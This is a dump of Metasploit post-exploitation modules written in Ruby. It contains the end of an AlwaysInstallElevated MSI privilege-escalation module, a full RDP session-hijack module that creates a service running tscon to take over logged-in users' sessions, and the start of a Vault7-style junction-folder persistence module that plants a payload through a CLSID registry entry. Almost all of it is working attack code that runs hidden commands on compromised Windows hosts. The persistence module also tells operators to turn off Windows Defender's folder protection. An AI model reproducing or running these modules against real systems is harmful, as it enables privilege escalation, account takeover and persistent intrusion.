120 | [ 'URL', 'http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx' ]
121 | ],
122 | 'DefaultOptions' =>
123 | {
124 | 'SESSION' => '1', # Default its to run againts session 1
125 | },
126 | 'SessionTypes' => [ 'meterpreter' ]
127 |
128 | ))
129 |
130 | register_options(
131 | [
132 | OptString.new('SESSION', [ true, 'The session number to run this module on']),
133 | OptBool.new('GET_SYSTEM', [ false, 'Elevate current session to nt authority/system' , false]),
134 | OptBool.new('MSI_ESCALATION', [ false, 'Check/Elevate MSI files install permissions' , false])
135 | ], self.class)
136 |
137 | register_advanced_options(
138 | [
139 | OptBool.new('REVERT_PRIVS', [ false, 'Revert MSI install permissions to dword:0' , false])
140 | ], self.class)
141 |
142 | end
143 |
144 |
145 |
146 |
147 |
148 | # ----------------------------------------------
149 | # Check for proper target Platform (win32|win64)
150 | # ----------------------------------------------
151 | def unsupported
152 | sys = session.sys.config.sysinfo
153 | print_error("Operative System: #{sys['OS']}")
154 | print_error("This auxiliary only works against windows systems!")
155 | print_warning("Please execute [info] for further information...")
156 | print_line("")
157 | raise Rex::Script::Completed
158 | end
159 |
160 |
161 |
162 |
163 | # ----------------------------------------
164 | # 'Privilege escalation' - Getting @SYSTEM
165 | # ----------------------------------------
166 | def ls_getsys
167 |
168 | toor = []
169 | # variable API declarations
170 | toor = client.sys.config.getuid
171 | print_status("Client UID: #{toor}")
172 | print_status("Elevate client session to: nt authority/system")
173 | # getprivs API call loop funtion
174 | client.sys.config.getprivs.each do |priv|
175 | print_good(" Impersonate token => #{priv}")
176 | end
177 |
178 | # checking results (if_system)
179 | result = client.priv.getsystem
180 | if result and result[0]
181 |
182 | csuid = []
183 | csuid = client.sys.config.getuid
184 | # print results on screen if successefully executed
185 | print_status("Current client UID: #{csuid}")
186 | print_line("")
187 |
188 | else
189 | # error display in executing command
190 | print_error("Fail to obtain [nt authority/system] access!")
191 | print_error("Please manually run: getsystem to gain system privs!")
192 | end
193 | end
194 |
195 |
196 |
197 |
198 | # -------------------------------------------------------
199 | # 'Privilege escalation' - CHECK/SET REMOTE REGISTRY KEYS
200 | # -------------------------------------------------------
201 | def ls_stage1
202 |
203 | # list of arrays to be executed
204 | elevate = [
205 | 'REG ADD HKCU\\Software\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1 /f',
206 | 'REG ADD HKLM\\Software\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1 /f',
207 | 'RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True' # this key will refresh explorer.exe
208 | ]
209 |
210 | r=''
211 | install_key = "AlwaysInstallElevated"
212 | print_status("Checking [ HKLM ] remote regedit settings...")
213 | hklm = "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer"
214 | # check 'AlwaysInstallElevated' registry keys settings on target
215 | local_machine_value = registry_getvaldata(hklm,install_key)
216 |
217 | if local_machine_value.nil? || local_machine_value == 0
218 | # 'AlwaysInstallElevated' registry key non existence (build required keys then)
219 | print_error("HKEY_LOCAL_MACHINE - '#{install_key}' does NOT exist or is SET to dword:0")
220 | print_warning("Setting '#{install_key}' remote requiered registry keys...")
221 |
222 | # registry keys loop funtion
223 | session.response_timeout=120
224 | elevate.each do |evl|
225 | r = session.sys.process.execute("cmd.exe /c #{evl}", nil, {'Hidden' => true, 'Channelized' => true})
226 | print_good(" exec => #{evl}")
227 |
228 | # close client channel when done
229 | while(d = r.channel.read)
230 | break if d == ""
231 | end
232 | r.channel.close
233 | r.close
234 | end
235 |
236 | else
237 | # 'AlwaysInstallElevated' remote registry keys are allready set to dword:1 (success!!!)
238 | print_status("HKEY_LOCAL_MACHINE - '#{install_key}' allready set to dword:#{local_machine_value}")
239 | print_warning("[REMARK]: Bypass its allready active. (no further need to change reg key data again)!")
240 | print_good(" Congratz, We are hable to install/run .MSI files with elevated 'SYSTEM' permissions...")
241 | print_line("")
242 | return
243 | end
244 |
245 | # print display on screen
246 | print_status("REMARK: next time target machine reboots it will let us install/run .MSI files with 'SYSTEM' permissions...")
247 | print_line("")
248 | end
249 |
250 |
251 |
252 |
253 |
254 |
255 | # ---------------------------------------------------------------------
256 | # REVERT 'AlwaysInstallElevated' REMOTE REGISTRY KEYS TO DEFAULT VALUES
257 | # ---------------------------------------------------------------------
258 | def ls_stage2
259 |
260 | # list of arrays to be executed
261 | revert = [
262 | 'REG ADD HKCU\\Software\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated /t REG_DWORD /d 0 /f',
263 | 'REG ADD HKLM\\Software\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated /t REG_DWORD /d 0 /f',
264 | 'RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True' # this key will refresh explorer.exe
265 | ]
266 |
267 | r=''
268 | install_key = "AlwaysInstallElevated"
269 | print_status("Checking [ HKLM ] remote regedit settings...")
270 | print_warning("Reading service hive registry keys...")
271 | sleep(1.0)
272 | # search in target regedit for reg key existence
273 | if registry_enumkeys("HKLM\\System\\CurrentControlSet\\services\\#{install_key}")
274 | print_good("Remote reg key: #{install_key} found!")
275 | sleep(1.0)
276 | else
277 | print_error("ABORT: post-module cant find #{install_key} in regedit...")
278 | return nil
279 | end
280 |
281 | # executing list of arrays on target system and display info on screen
282 | print_status("Revert 'AlwaysInstallElevated' registry keys to dword:0 (default)")
283 | print_warning("Setting remote requiered registry keys...")
284 | session.response_timeout=120
285 | revert.each do |rev|
286 | begin
287 | # execute cmd prompt in a hidden channelized windows
288 | r = session.sys.process.execute("cmd.exe /c #{rev}", nil, {'Hidden' => true, 'Channelized' => true})
289 | print_good(" exec => #{rev}")
290 |
291 | # close client channel when done
292 | while(d = r.channel.read)
293 | break if d == ""
294 | end
295 | r.channel.close
296 | r.close
297 | # error exception funtion
298 | rescue ::Exception => e
299 | print_error("Error Running Command: #{e.class} #{e}")
300 | print_warning("Try to rise meterpreter session to [nt authority/system] before runing this module")
301 | end
302 | end
303 | # print display on screen
304 | print_status("Job done, 'AlwaysInstallElevated' registry keys changed to default values...")
305 | print_line("")
306 | end
307 |
308 |
309 |
310 |
311 | # ------------------------------------------------
312 | # MAIN DISPLAY WINDOWS (ALL MODULES - def run)
313 | # Running sellected modules against session target
314 | # ------------------------------------------------
315 | def run
316 | session = client
317 | # Check for proper target Platform
318 | unsupported if client.platform !~ /win32|win64/i
319 |
320 | # Variable declarations (msf API calls)
321 | sysnfo = session.sys.config.sysinfo
322 | runtor = client.sys.config.getuid
323 | runsession = client.session_host
324 | directory = client.fs.dir.pwd
325 |
326 | # Print banner and scan results on screen
327 | print_line(" +-----------------------------------------+")
328 | print_line(" | * MSI Install Privilege Escalation * |")
329 | print_line(" | Author: Pedro Ubuntu [ r00t-3xp10it ] |")
330 | print_line(" +-----------------------------------------+")
331 | print_line("")
332 | print_line(" Running on session : #{datastore['SESSION']}")
333 | print_line(" Computer : #{sysnfo['Computer']}")
334 | print_line(" Operative System : #{sysnfo['OS']}")
335 | print_line(" Target IP addr : #{runsession}")
336 | print_line(" Payload directory : #{directory}")
337 | print_line(" Client UID : #{runtor}")
338 | print_line("")
339 | print_line("")
340 |
341 |
342 | # check for proper session.
343 | if not sysinfo.nil?
344 | print_status("Running module against: #{sysnfo['Computer']}")
345 | else
346 | print_error("ABORT]:This post-module only works in meterpreter sessions")
347 | raise Rex::Script::Completed
348 | end
349 |
350 |
351 | # ------------------------------------
352 | # Selected settings to run
353 | # ------------------------------------
354 | if datastore['GET_SYSTEM']
355 | ls_getsys
356 | end
357 |
358 | if datastore['MSI_ESCALATION']
359 | ls_stage1
360 | end
361 |
362 | if datastore['REVERT_PRIVS']
363 | ls_stage2
364 | end
365 | end
366 | end
367 |
--------------------------------------------------------------------------------
/Under-Develop/korznikov_session_hijack.rb:
--------------------------------------------------------------------------------
1 | ##
2 | # This file is part of the Metasploit Framework and may be subject to
3 | # redistribution and commercial restrictions. Please see the Metasploit
4 | # Framework web site for more information on licensing and terms of use.
5 | # http://metasploit.com/framework/
6 | ##
7 |
8 |
9 | ##
10 | # Exploit Title : korznikov_session_hijack.rb
11 | # Module Author : pedr0 Ubuntu [r00t-3xp10it]
12 | # Vuln discover : korznikov
13 | # Tested on : Windows 2008 | Windows 2012 | Windows 7 | Windows 10
14 | # POC: http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html
15 | #
16 | #
17 | #
18 | # [ DESCRIPTION ]
19 | # A privileged user which can gain command execution with NT AUTHORITY/SYSTEM rights can hijack
20 | # any currently logged in user's session, without any knowledge about his credentials. Terminal
21 | # Services session can be either in connected or disconnected state. This is high risk vulnerability
22 | # which allows any local admin to hijack a session and get access to:
23 | # ---
24 | # 1. Domain admin session.
25 | # 2. Any unsaved documents, that hijacked user works on.
26 | # 3. Any other systems/applications in which hijacked user previously logged in (May include another
27 | # Remote Desktop sessions, Network Share mappings, applications which require another credentials).
28 | # ---
29 | #
30 | #
31 | #
32 | # [ MODULE OPTIONS ]
33 | # The session number to run this module on => set SESSION 3
34 | # Check available IDs in target system => set CHECK_ID true
35 | # The Session ID to be hijacked (eg 1) => set HIJACK_ID 1
36 | # The service name to be created => set SERVICE_NAME myservice
37 | # Delete malicious service created? => set DEL_SERVICE true
38 | #
39 | #
40 | #
41 | # [ PORT MODULE TO METASPLOIT DATABASE ]
42 | # Kali linux COPY TO: /usr/share/metasploit-framework/modules/post/windows/escalate/korznikov_session_hijack.rb
43 | # Ubuntu linux COPY TO: /opt/metasploit/apps/pro/msf3/modules/post/windows/escalate/korznikov_session_hijack.rb
44 | # Manually Path Search: root@kali:~# locate modules/post/windows/escalate
45 | #
46 | #
47 | # [ LOAD/USE AUXILIARY ]
48 | # meterpreter > background
49 | # msf exploit(handler) > reload_all
50 | # msf exploit(handler) > use post/windows/escalate/korznikov_session_hijack.rb
51 | # msf post(korznikov_session_hijack) > info
52 | # msf post(korznikov_session_hijack) > show options
53 | # msf post(korznikov_session_hijack) > show advanced options
54 | # msf post(korznikov_session_hijack) > set [option(s)]
55 | # msf post(korznikov_session_hijack) > exploit
56 | #
57 | # [ HINT ]
58 | # In some linux distributions postgresql needs to be started and
59 | # metasploit database deleted/rebuild to be abble to load module.
60 | # 1 - service postgresql start
61 | # 2 - msfdb delete (optional)
62 | # 3 - msfdb init (optional)
63 | # 4 - msfconsole
64 | # 5 - reload_all
65 | ##
66 |
67 |
68 |
69 |
70 | # ----------------------------
71 | # Module Dependencies/requires
72 | # ----------------------------
73 | require 'rex'
74 | require 'msf/core'
75 | require 'msf/core/post/common'
76 | require 'msf/core/post/windows/priv'
77 | require 'msf/core/post/windows/registry'
78 |
79 |
80 |
81 |
82 | # ----------------------------------
83 | # Metasploit Class name and includes
84 | # ----------------------------------
85 | class MetasploitModule < Msf::Post
86 | Rank = GreatRanking
87 |
88 | include Msf::Post::Common
89 | include Msf::Post::Windows::Priv
90 | include Msf::Post::Windows::Error
91 | include Msf::Post::Windows::Registry
92 |
93 |
94 |
95 |
96 | # -----------------------------------------
97 | # Building Metasploit/Armitage info GUI/CLI
98 | # -----------------------------------------
99 | def initialize(info={})
100 | super(update_info(info,
101 | 'Name' => 'korznikov logon session hijack',
102 | 'Description' => %q{
103 | A privileged user which can gain command execution with NT AUTHORITY/SYSTEM rights and can hijack any currently logged in user's session without any knowledge about his credentials. Terminal Services session can be either in connected or disconnected state.
104 | },
105 | 'License' => UNKNOWN_LICENSE,
106 | 'Author' =>
107 | [
108 | 'Module Author: pedr0 Ubuntu [r00t-3xp10it]', # post-module author
109 | 'Vuln discover: korznikov', # vuln discover credits
110 | ],
111 |
112 | 'Version' => '$Revision: 1.2',
113 | 'DisclosureDate' => 'mar 21 2017',
114 | 'Platform' => 'windows',
115 | 'Arch' => 'x86_x64',
116 | 'Privileged' => 'true', # requires a privilege session ..
117 | 'Targets' =>
118 | [
119 | # Tested againts Windows 10
120 | [ 'Windows 2008', 'Windows 2012', 'Windows 7', 'Windows 10' ]
121 | ],
122 | 'DefaultTarget' => '4', # default its to run againts windows 10
123 | 'References' =>
124 | [
125 | [ 'URL', 'https://github.com/r00t-3xp10it' ],
126 | [ 'URL', 'https://github.com/r00t-3xp10it/msf-auxiliarys' ],
127 | [ 'URL', 'http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html' ]
128 |
129 |
130 | ],
131 | 'DefaultOptions' =>
132 | {
133 | 'SESSION' => '1', # Default its to run againts session 1
134 | 'HIJACK_ID' => '1', # Default its to run againts user id 1
135 | 'SERVICE_NAME' => 'sesshijack', # Default its to create sesshijack service
136 | },
137 | 'SessionTypes' => [ 'meterpreter' ]
138 |
139 | ))
140 |
141 | register_options(
142 | [
143 | OptString.new('SESSION', [ true, 'The session number to run this module on']),
144 | OptBool.new('CHECK_ID', [ false, 'Check available IDs in target system' , false]),
145 | OptBool.new('HIJACK_ID', [ false, 'The Session ID to be hijacked (eg 1)' , false])
146 | ], self.class)
147 |
148 | register_advanced_options(
149 | [
150 | OptString.new('SERVICE_NAME', [ true, 'The service name to be created (eg myservice)']),
151 | OptBool.new('DEL_SERVICE', [ false, 'Delete malicious service created?' , false])
152 | ], self.class)
153 |
154 |
155 | end
156 |
157 |
158 |
159 |
160 | # --------------------------
161 | # CHECK TARGET IDs AVAILABLE
162 | # --------------------------
163 | def ls_stage1
164 |
165 | r=''
166 | session = client
167 | com_query = "query user" # net user
168 | # check for proper config settings enter
169 | # to prevent 'unset all' from deleting default options...
170 | if datastore['CHECK_ID'] == 'nil'
171 | print_error("Options not configurated correctly ..")
172 | print_warning("Please set CHECK_ID option!")
173 | return nil
174 | else
175 | print_status("Reporting logged users ids available!")
176 | Rex::sleep(1.5)
177 | end
178 |
179 | #
180 | # querying remote target logged users ids (cmd.exe)
181 | #
182 | print_good(" exec => cmd.exe /c #{com_query} ..")
183 | Rex::sleep(1.0)
184 | print_line("")
185 | r = session.sys.process.execute("cmd.exe /c #{com_query}", nil, {'Hidden' => true, 'Channelized' => true})
186 |
187 | # close channel when done
188 | print_line("")
189 | Rex::sleep(1.0)
190 | r.channel.close
191 | r.close
192 |
193 | # error exception funtion
194 | rescue ::Exception => e
195 | print_error("Error: #{e.class} #{e}")
196 | end
197 |
198 |
199 |
200 |
201 | # -----------------------------------------------
202 | # GAIN REMOTE CODE EXCUTION BY CREATING A SERVICE
203 | # -----------------------------------------------
204 | def ls_stage2
205 |
206 | r=''
207 | session = client
208 | com_useid = datastore['HIJACK_ID'] # user id to be hijacked
209 | com_servi = datastore['SERVICE_NAME'] # service name to be created
210 | com_start = "net start #{com_servi}" # start remote malicious service
211 | com_comps = "%systemdrive%\\system32\\cmd.exe" # cmd.exe compspec path
212 | com_execs = "sc create #{com_servi} binpath= \"#{com_comps} /k tscon #{com_useid} /dest:rdp-tcp#55\"" # create service
213 | #
214 | # com_execs = "tscon #{com_useid} /dest:#{User_acc_name}\"" # create service
215 | #
216 | # check for proper config settings enter
217 | # to prevent 'unset all' from deleting default options...
218 | if datastore['HIJACK_ID'] == 'nil' || datastore['SERVICE_NAME'] == 'nil'
219 | print_error("Options not configurated correctly ..")
220 | print_warning("Please set HIJACK_ID | SERVICE_NAME options!")
221 | return nil
222 | else
223 | print_status("Hijacking RDP process!")
224 | Rex::sleep(1.5)
225 | end
226 |
227 | #
228 | # TODO: check rdp service name in taskmanager
229 | # Search in target if service its active
230 | #
231 | print_warning("Searching RDP service existence ..")
232 | Rex::sleep(1.0)
233 | session.sys.process.get_processes().each do |x|
234 | if x['name'].downcase == "rdp.exe"
235 | print_good(" exec => process RDP found running ..")
236 | Rex::sleep(1.0)
237 | else
238 | # service not found running in target system
239 | print_error("[ABORT]: module cant find service ..")
240 | print_warning("System does not appear to be vulnerable to the exploit code!")
241 | print_line("")
242 | Rex::sleep(1.0)
243 | return nil
244 | end
245 | end
246 |
247 | #
248 | # Execute process hijacking in registry
249 | # sc create sesshijack binpath= "%systemdrive%\system32\cmd.exe /k tscon 1 /dest:rdp-tcp#55"
250 | #
251 | print_good(" exec => Creating service to gain code execution ..")
252 | Rex::sleep(1.0)
253 | print_good(" exec => #{com_execs}")
254 | r = session.sys.process.execute("cmd.exe /c #{com_execs}", nil, {'Hidden' => true, 'Channelized' => true})
255 | # give a proper time to refresh regedit 'enigma0x3' :D
256 | Rex::sleep(4.5)
257 |
258 | # start remote service to gain code execution
259 | print_good(" exec => Starting #{com_servi} service ..")
260 | Rex::sleep(1.0)
261 | r = session.sys.process.execute("cmd.exe /c #{com_start}", nil, {'Hidden' => true, 'Channelized' => true})
262 |
263 | # close channel when done
264 | print_status("Session hijack Credits: @korznikov")
265 | print_line("")
266 | Rex::sleep(1.0)
267 | r.channel.close
268 | r.close
269 |
270 | # error exception funtion
271 | rescue ::Exception => e
272 | print_error("Error: #{e.class} #{e}")
273 | end
274 |
275 |
276 |
277 |
278 | # --------------------------------------------
279 | # DELETE MALICIOUS SERVICE (session hijacking)
280 | # --------------------------------------------
281 | def ls_stage3
282 |
283 | r=''
284 | session = client
285 | com_servi = datastore['SERVICE_NAME'] # myservice
286 | com_delet = "sc delete #{com_servi}" # malicious service to delete
287 | hklm = "HKLM\\System\\CurrentControlSet\\services\\#{com_servi}" # malicious service hive key
288 | # check for proper config settings enter
289 | # to prevent 'unset all' from deleting default options...
290 | if datastore['DEL_SERVICE'] == 'nil' || datastore['SERVICE_NAME'] == 'nil'
291 | print_error("Options not configurated correctly...")
292 | print_warning("Please set DEL_SERVICE | SERVICE_NAME options!")
293 | return nil
294 | else
295 | print_status("Deleting malicious #{com_servi} service!")
296 | Rex::sleep(1.5)
297 | end
298 |
299 | #
300 | # TODO: check if it writes in HKLM or HKCU
301 | # search in target regedit for service existence ..
302 | #
303 | print_warning("Reading service hive registry keys ..")
304 | sleep(1.0)
305 | if registry_enumkeys("HKLM\\System\\CurrentControlSet\\services\\#{com_servi}")
306 | print_good(" exec => Remote service: #{com_servi} found ..")
307 | sleep(1.0)
308 | else
309 | print_error("[ ABORT ]: post-module cant find #{com_servi} in regedit ..")
310 | print_warning("Enter into a shell session and execute: sc qc #{com_servi}")
311 | print_line("")
312 | print_line("")
313 | # display remote service current settings...
314 | # cloning SC qc display outputs...
315 | print_line("SERVICE_NAME: #{com_servi}")
316 | print_line(" [SC] Query Service Failed 404: NOT FOUND ..")
317 | print_line("")
318 | print_line("")
319 | return nil
320 | end
321 |
322 | #
323 | # delete malicious service on target (cmd.exe)
324 | #
325 | print_good(" exec => #{com_delet}")
326 | Rex::sleep(1.0)
327 | r = session.sys.process.execute("cmd.exe /c #{com_delet}", nil, {'Hidden' => true, 'Channelized' => true})
328 | print_status("Service #{com_servi} successfully deleted ..")
329 |
330 | # close channel when done
331 | print_line("")
332 | Rex::sleep(1.0)
333 | r.channel.close
334 | r.close
335 |
336 | # error exception funtion
337 | rescue ::Exception => e
338 | print_error("Error: #{e.class} #{e}")
339 | end
340 |
341 |
342 |
343 |
344 |
345 | # ------------------------------------------------
346 | # MAIN DISPLAY WINDOWS (ALL MODULES - def run)
347 | # Running sellected modules against session target
348 | # ------------------------------------------------
349 | def run
350 | session = client
351 |
352 | # Variable declarations (msf API calls)
353 | oscheck = client.fs.file.expand_path("%OS%")
354 | sysnfo = session.sys.config.sysinfo
355 | runtor = client.sys.config.getuid
356 | runsession = client.session_host
357 | directory = client.fs.dir.pwd
358 |
359 |
360 |
361 | # Print banner and scan results on screen
362 | print_line(" +---------------------------------------------+")
363 | print_line(" | hijack currently logged in user session |")
364 | print_line(" | Author : r00t-3xp10it |")
365 | print_line(" +---------------------------------------------+")
366 | print_line("")
367 | print_line(" Running on session : #{datastore['SESSION']}")
368 | print_line(" Computer : #{sysnfo['Computer']}")
369 | print_line(" Operative System : #{sysnfo['OS']}")
370 | print_line(" Target IP addr : #{runsession}")
371 | print_line(" Payload directory : #{directory}")
372 | print_line(" Client UID : #{runtor}")
373 | print_line("")
374 | print_line("")
375 |
376 |
377 | #
378 | # the 'def check()' funtion that rapid7 requires to accept new modules.
379 | # Guidelines for Accepting Modules and Enhancements:https://goo.gl/OQ6HEE
380 | #
381 | # check for proper operative system (windows-not-wine)
382 | if not oscheck == "Windows_NT"
383 | print_error("[ ABORT ]: Non-Compatible system found ..")
384 | print_warning("This module only works againts windows systems")
385 | return nil
386 | end
387 | #
388 | # TODO: check if this works..
389 | # check for proper operative system (Windows 2008|2012|7|10)
390 | #
391 | if not sysinfo['OS'] =~ /Windows (2008|2012|7|10)/
392 | print_error("[ ABORT ]: Non-Compatible system found ..")
393 | print_warning("Vulnerable systems: Windows 2008|2012|7|10")
394 | return nil
395 | end
396 | # check for proper session (meterpreter)
397 | # the non-return of sysinfo command reveals
398 | # that we are not on a meterpreter session!
399 | if not sysinfo.nil?
400 | print_status("Running module against: #{sysnfo['Computer']}")
401 | else
402 | print_error("[ ABORT ]: This module requires a meterpreter session ..")
403 | return nil
404 | end
405 | #
406 | # check if we are running againts a priviliged session
407 | #
408 | if not runtor == "NT AUTHORITY\\SYSTEM"
409 | print_error("[ ABORT ]: This module requires a priviliged session ..")
410 | print_warning("This module requires NT AUTHORITY\\SYSTEM privs to run")
411 | return nil
412 | end
413 | # elevate session privileges befor runing options
414 | client.sys.config.getprivs.each do |priv|
415 | end
416 |
417 |
418 |
419 | # ------------------------------------
420 | # Selected settings to run
421 | # ------------------------------------
422 | if datastore['CHECK_ID']
423 | ls_stage1
424 | end
425 |
426 | if datastore['HIJACK_ID']
427 | ls_stage2
428 | end
429 |
430 | if datastore['DEL_SERVICE']
431 | ls_stage3
432 | end
433 | end
434 | end
435 |
--------------------------------------------------------------------------------
/windows/hijack/junction_shell_folders_persistance.rb:
--------------------------------------------------------------------------------
1 | ##
2 | # This file is part of the Metasploit Framework and may be subject to
3 | # redistribution and commercial restrictions. Please see the Metasploit
4 | # Framework web site for more information on licensing and terms of use.
5 | # http://metasploit.com/framework/
6 | ##
7 |
8 |
9 | ##
10 | # Exploit Title : junction_shell_folders_persistence.rb
11 | # Module Author : pedr0 Ubuntu [r00t-3xp10it]
12 | # Vuln discover : vault7 | wikileaks | nsa
13 | # Tested on : Windows 2008 | Windows 7 | Windows 10
14 | # POC: https://wikileaks.org/ciav7p1/cms/page_13763373.html
15 | #
16 | #
17 | # [ DESCRIPTION ]
18 | # Implementation of vault7 junction folders persistence mechanism. A junction folder in Windows is a method in which
19 | # the user can cause a redirection to another folder/appl. This module will add a registry hive in HKCU(CLSID) to be
20 | # abble to execute our payload, then builds a Folder named POC.{GUID} that if accessed will trigger the execution of
21 | # our payload. Also Check ADVANCED OPTIONS for PERSIST_EXPLORER (payload.dll) or RENAME_PERSIST (payload.dll) options.
22 | #
23 | #
24 | # [ MODULE OPTIONS ]
25 | # The session number to run this module on => set SESSION 3
26 | # The full path of the appl or payload to run => set APPL_PATH C:\\Windows\\System32\\calc.exe
27 | # The full path and name of folder to be created => set FOLDER_PATH C:\\Users\\%username%\\Destop\\POC
28 | # The full path [local] were to store logfiles => set LOOT_FOLDER /root/.msf4/loot
29 | # Use explorer Start Menu to persiste our agent.dll? => set PERSIST_EXPLORER true
30 | # Rename ..\\Start Menu\\..\\Accessories.{GUID}? => set RENAME_PERSIST true
31 | # ----------------------------------------------------------------------------------------------------
32 | # WARNING: 'PERSIST_EXPLORER' and 'RENAME_PERSIST' technics were tested using one payload.DLL and
33 | # 'RENAME_PERSIST' option will rename %AppData%\\microsoft\\windows\\Start Menu\\Programs\\Accessories
34 | # to: %AppData%\\microsoft\\windows\\Start Menu\\Programs\\Accessories.{GUID} <--junction folder
35 | # ----------------------------------------------------------------------------------------------------
36 | #
37 | #
38 | #
39 | # [ PORT MODULE TO METASPLOIT DATABASE ]
40 | # Kali linux COPY TO: /usr/share/metasploit-framework/modules/post/windows/escalate/junction_shell_folders_persistence.rb
41 | # Ubuntu linux COPY TO: /opt/metasploit/apps/pro/msf3/modules/post/windows/escalate/junction_shell_folders_persistence.rb
42 | # Manually Path Search: root@kali:~# locate modules/post/windows/escalate
43 | #
44 | #
45 | # [ LOAD/USE AUXILIARY ]
46 | # meterpreter > background
47 | # msf exploit(handler) > reload_all
48 | # msf exploit(handler) > use post/windows/escalate/junction_shell_folders_persistence
49 | # msf post(junction_shell_folders_persistence) > info
50 | # msf post(junction_shell_folders_persistence) > show options
51 | # msf post(junction_shell_folders_persistence) > show advanced options
52 | # msf post(junction_shell_folders_persistence) > set [option(s)]
53 | # msf post(junction_shell_folders_persistence) > exploit
54 | #
55 | # [ HINT ]
56 | # In some linux distributions postgresql needs to be started and
57 | # metasploit database deleted/rebuild to be abble to load module.
58 | # 1 - service postgresql start
59 | # 2 - msfdb reinit (optional)
60 | # 3 - msfconsole -x 'reload_all'
61 | ##
62 |
63 |
64 |
65 | #
66 | # Metasploit Module librarys to load ..
67 | #
68 | require 'rex'
69 | require 'msf/core'
70 | require 'msf/core/post/common'
71 | require 'msf/core/post/windows/priv'
72 | require 'msf/core/post/windows/registry'
73 |
74 |
75 |
76 | #
77 | # Metasploit Class name and mixins ..
78 | #
79 | class MetasploitModule < Msf::Post
80 | Rank = ExcellentRanking
81 |
82 | include Msf::Post::Common
83 | include Msf::Post::Windows::Priv
84 | include Msf::Post::Windows::Error
85 | include Msf::Post::Windows::Registry
86 |
87 |
88 |
89 | #
90 | # The 'def initialize()' funtion ..
91 | # Building Metasploit/Armitage info GUI/CLI description
92 | #
93 | def initialize(info={})
94 | super(update_info(info,
95 | 'Name' => 'vault7 junction folders [User-level Persistence]',
96 | 'Description' => %q{
97 | Implementation of vault7 junction folders persistence mechanism. A junction folder in Windows is a method in which the user can cause a redirection to another folder/appl. This module will add a registry hive in HKCU(CLSID) to be abble to execute our payload, then builds a Folder named POC.{GUID} that if accessed will trigger the execution of our payload. Also Check ADVANCED OPTIONS for PERSIST_EXPLORER (payload.dll) or RENAME_PERSIST (payload.dll) options.
98 | },
99 | 'License' => UNKNOWN_LICENSE,
100 | 'Author' =>
101 | [
102 | 'Module Author: r00t-3xp10it', # post-module author
103 | 'Vuln discover: vault7 | wikileaks | nsa', # vulnerability credits
104 | 'special thanks: browninfosecguy | betto(ssa)', # module debug help
105 | ],
106 |
107 | 'Version' => '$Revision: 1.5',
108 | 'DisclosureDate' => 'jun 4 2018',
109 | 'Platform' => 'windows',
110 | 'Arch' => 'x86_x64',
111 | 'Privileged' => 'false', # thats no need for privilege escalation..
112 | 'Targets' =>
113 | [
114 | # Tested againts windows 2008 | windows 7 | Windows 10
115 | [ 'Windows 2008', 'Windows xp', 'windows vista', 'windows 7', 'Windows 10' ]
116 | ],
117 | 'DefaultTarget' => '4', # default its to run againts windows 7
118 | 'References' =>
119 | [
120 | [ 'URL', 'https://github.com/r00t-3xp10it/msf-auxiliarys' ],
121 | [ 'URL', 'https://wikileaks.org/ciav7p1/cms/page_13763373.html' ]
122 |
123 |
124 | ],
125 | 'DefaultOptions' =>
126 | {
127 | 'SESSION' => '1', # run againts session 1
128 | 'LOOT_FOLDER' => '/root/.msf4/loot', # default logs storage directory
129 | 'APPL_PATH' => '%windir%\\System32\\calc.exe', # Default appl (payload) to run
130 | 'FOLDER_PATH' => 'C:\\Users\\%username%\\Desktop\\POC', # Default folder path (demo)
131 | },
132 | 'SessionTypes' => [ 'meterpreter' ]
133 |
134 | ))
135 |
136 | register_options(
137 | [
138 | OptString.new('SESSION', [ true, 'The session number to run this module on']),
139 | OptString.new('APPL_PATH', [ true, 'The full path of the appl or payload to run']),
140 | OptString.new('FOLDER_PATH', [ true, 'The full path and name of folder to be created']),
141 | OptString.new('LOOT_FOLDER', [ false, 'The full path [local] where to store logfiles'])
142 | ], self.class)
143 |
144 | register_advanced_options(
145 | [
146 | OptBool.new('PERSIST_EXPLORER', [ false, 'Use explorer Start Menu to persiste our agent.dll?' , false]),
147 | OptBool.new('RENAME_PERSIST', [ false, 'Rename Start Menu\\..\\Accessories to Accessories.{GUID}?' , false])
148 | ], self.class)
149 |
150 | end
151 |
152 |
153 |
154 | def run
155 | session = client
156 | #
157 | # Variable declarations (msf API calls)
158 | #
159 | oscheck = client.fs.file.expand_path("%OS%")
160 | sysnfo = session.sys.config.sysinfo
161 | runtor = client.sys.config.getuid
162 | runsession = client.session_host
163 | directory = client.fs.dir.pwd
164 | # elevate session privileges befor runing options
165 | client.sys.config.getprivs.each do |priv|
166 | end
167 | #
168 | # MODULE BANNER
169 | #
170 | print_line(" +------------------------------------------------+")
171 | print_line(" | junction Shell Folders (User-Land Persistence) |")
172 | print_line(" | Author : r00t-3xp10it (SSA) |")
173 | print_line(" +------------------------------------------------+")
174 | print_line("")
175 | print_line(" Running on session : #{datastore['SESSION']}")
176 | print_line(" Computer : #{sysnfo['Computer']}")
177 | print_line(" Target IP addr : #{runsession}")
178 | print_line(" Operative System : #{sysnfo['OS']}")
179 | print_line(" Payload directory : #{directory}")
180 | print_line(" Client UID : #{runtor}")
181 | print_line("")
182 | print_line("")
183 |
184 |
185 | #
186 | # the 'def check()' funtion that rapid7 requires to accept new modules.
187 | # Guidelines for Accepting Modules and Enhancements:https://goo.gl/OQ6HEE
188 | #
189 | # check for proper operative system (windows-not-wine)
190 | if not oscheck == "Windows_NT"
191 | print_error("[ ABORT ]: This module only works againts windows systems")
192 | return nil
193 | end
194 | #
195 | # check for proper operative system (not windows 10)
196 | #
197 | if sysinfo['OS'] =~ /Windows 10/
198 | print_line("windows 10 version its protected againts this exploit.")
199 | print_line("-------------------------------------------------------")
200 | print_line("Disable 'Controlled folder access' in Windows Defender")
201 | print_line("If you wish to teste this on windows 10 version distros")
202 | print_line("-------------------------------------------------------")
203 | Rex::sleep(7.0)
204 | end
205 |
206 |
207 | # variable declarations ..
